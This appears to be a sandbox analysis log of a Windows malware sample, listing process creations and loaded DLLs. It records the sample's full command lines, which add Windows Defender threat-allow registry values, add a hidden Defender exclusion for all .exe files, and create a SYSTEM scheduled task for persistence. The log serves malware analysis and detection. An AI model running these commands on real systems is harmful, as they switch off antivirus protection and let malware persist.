Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process created: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe .\Install.exe /dXVdidiCT "385121" /S
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 736
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7916 -ip 7916
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 744
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7916 -ip 7916
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 764
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7916 -ip 7916
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 748
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\SysWOW64\gpupdate.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7916 -ip 7916
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 984
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bMvfdBTccYfZYKRCwN" /SC once /ST 18:54:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe\" Is /mKdidL 385121 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7916 -ip 7916
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Process created: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp "C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp" /SL5="$70060,2863082,54272,C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process created: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe .\Install.exe Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process created: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe "C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe" -i Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process created: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe .\Install.exe /dXVdidiCT "385121" /S Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 736
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 744
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 764
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 748
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 984
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bMvfdBTccYfZYKRCwN" /SC once /ST 18:54:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe\" Is /mKdidL 385121 /S" /V1 /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: fwpuclnt.dll Jump to behavior
